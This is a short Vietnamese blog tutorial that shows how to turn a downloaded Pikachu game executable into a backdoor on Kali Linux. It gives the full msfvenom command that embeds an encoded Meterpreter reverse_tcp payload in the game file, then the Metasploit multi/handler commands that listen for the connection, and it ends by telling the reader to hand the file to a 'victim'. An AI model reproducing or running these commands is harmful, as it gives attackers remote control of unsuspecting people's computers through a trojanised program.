Tải 1 file exe bất kỳ về máy (ở đây tôi tải file game picachu.exe)
http://www.mediafire.com/file/qm6wi2l81plo1pr/tai-game-pikachu-co-dien-ve-may-tinh.rar
Lưu file Desktop của kali 2.0.
- Tạo backdoor
msfvenom -a x86 --platform windows -x picachu.exe -k -p windows/meterpreter/reverse_tcp lhost=192.168.2.22 lport=443 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o picachu_new.exe
Lần lượt chạy các lệnh
---------
msfconsole
---------
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.2.22
msf exploit(handler) > set lport 443
msf exploit(handler) > exploit
- Đưa file cho victim chạy và chờ kết quả.
Pages
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment